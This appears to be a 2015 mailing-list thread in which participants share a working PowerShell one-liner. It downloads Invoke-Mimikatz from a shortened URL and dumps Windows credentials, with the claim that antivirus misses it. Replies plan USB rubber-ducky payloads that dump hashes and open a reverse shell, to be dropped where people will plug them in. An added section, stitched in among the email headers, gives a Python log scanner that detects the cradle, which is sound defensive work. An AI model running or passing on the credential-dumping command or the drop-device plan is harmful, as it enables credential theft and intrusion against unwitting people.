
This command runs mimikatz using PowerShell. It runs fully in memory and doesn't touch disk except if you choose to dump the output to a text file. So far I haven't seen AV detect it.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" > mimikatz.txt

Given what day it is, this isn't something along the lines of "Don't let Johnny jack into your switch," is it?
On 04/01/2015 09:42 AM, Jon Barclay wrote:
USHE-assess mailing list USHE-assess@lists.dixie.edu http://lists.dixie.edu/cgi-bin/mailman/listinfo/ushe-assess

That's a good find! I've been trying to solve the av-mimikatz issue for the rubber ducky for a little while now. I'll try it later when I can get a vm fired up.
I love that mimikatz has been rendered into its own PowerShell commandlet. That's just awesome sauce on your steak, right there. It's one of the best custom-written commandlets I've seen too. The reason AV doesn't alert on it is it's not truly the mimikatz binary, but is some kind of full PowerShell rewrite of the mimikatz functionality. I've used many PowerSploit commandlets before, even on your campus last week, but I've never seen or used this one. Pretty excited to see if I can finally make that work on the cheap Digisparks and their short memory! Then we'll have us some rubber ducky fun! Just throw those around everywhere to get plugged in.
On Wed, Apr 1, 2015 at 9:42 AM, Jon Barclay Jon.Barclay@uvu.edu wrote:

It works great with the twin duck firmware. ;-)
It seems like the ideal load for the duck is mimikatz, dump hashes, and then reverse shell. All in memory with PowerShell and all within 20 seconds.
From: ushe-assess-bounces@lists.dixie.edu [mailto:ushe-assess-bounces@lists.dixie.edu] On Behalf Of Chuck Kimber
Sent: Wednesday, April 1, 2015 10:42 AM
Cc: ushe-assess@lists.dixie.edu
Subject: Re: [USHE-assess] Mimikats
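The thread's claim is that the one-liner evades AV because nothing touches disk. From the defender's side, the counterpoint is that the download cradle itself is visible wherever PowerShell activity is logged: the full command line in process-creation auditing (Security event 4688 with command-line logging enabled) and the script text in PowerShell Script Block Logging (Microsoft-Windows-PowerShell/Operational event 4104). The following is an added example, not code from the thread or from any of its participants: a small Python scanner that runs cradle-indicator rules over constructed log entries. The event shapes, the `SAMPLE_EVENTS` list (the `example.invalid` URLs are RFC-reserved placeholders) and the severity tiers are assumptions chosen for this example; only the `is.gd` shortener and the mimikatz one-liner come from the thread.

```python
import re
from dataclasses import dataclass, field

# Indicator patterns for a PowerShell download-and-execute cradle and for
# the Invoke-Mimikatz invocation quoted in the thread. Case-insensitive,
# because PowerShell cmdlet and method names are case-insensitive.
CRADLE_PATTERNS = {
    "downloadstring": re.compile(r"\bDownloadString\s*\(", re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "iex": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "invoke_mimikatz": re.compile(r"\bInvoke-Mimikatz\b", re.I),
    "dumpcreds": re.compile(r"-DumpCreds\b", re.I),
    # is.gd appears in the thread; the other shorteners are assumed additions.
    "url_shortener": re.compile(r"https?://(is\.gd|bit\.ly|tinyurl\.com)/", re.I),
}


@dataclass
class Finding:
    event_id: int          # 4688 (process creation) or 4104 (script block)
    severity: str          # "medium", "high" or "critical"
    indicators: list = field(default_factory=list)


def classify(text: str):
    """Return (matched indicator names, severity) for one log entry."""
    hits = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(text)]
    if "invoke_mimikatz" in hits or "dumpcreds" in hits:
        severity = "critical"                     # credential dumping tool named outright
    elif {"downloadstring", "iex"} <= set(hits):
        severity = "high"                         # classic fetch-and-eval cradle
    elif hits:
        severity = "medium"                       # a single component, worth a look
    else:
        severity = "none"
    return hits, severity


def scan(events):
    """Run the rules over a list of {'event_id': int, 'text': str} entries."""
    findings = []
    for ev in events:
        hits, severity = classify(ev["text"])
        if severity != "none":
            findings.append(Finding(ev["event_id"], severity, hits))
    return findings


# Constructed sample log entries (not real telemetry). The first reproduces the
# command line from the thread as a 4688 process-creation event would record it.
SAMPLE_EVENTS = [
    {"event_id": 4688,
     "text": "powershell \"IEX (New-Object Net.WebClient).DownloadString("
             "'http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds\""},
    {"event_id": 4104,
     "text": "Get-ChildItem C:\\Users | Select-Object Name"},              # benign
    {"event_id": 4104,
     "text": "iex (new-object net.webclient).downloadstring("
             "'http://example.invalid/stage.ps1')"},                        # cradle only
    {"event_id": 4104,
     "text": "$wc = New-Object Net.WebClient; "
             "$wc.DownloadFile('http://example.invalid/a.txt', 'a.txt')"},  # one component
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.severity:8} {', '.join(f.indicators)}")
```

Run on the sample entries, the scanner flags the thread's one-liner as critical, the lower-cased cradle as high and the lone `Net.WebClient` use as medium, while the benign `Get-ChildItem` line produces nothing. Two practical caveats: 4688 only carries the command line when "Include command line in process creation events" is enabled in audit policy, and script block logging records the script text as executed, so content fetched at runtime by the cradle is logged too, which is why in-memory execution does not make this activity invisible to a host that logs PowerShell.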
participants (3)
- Andrew Goble
- Chuck Kimber
- Jon Barclay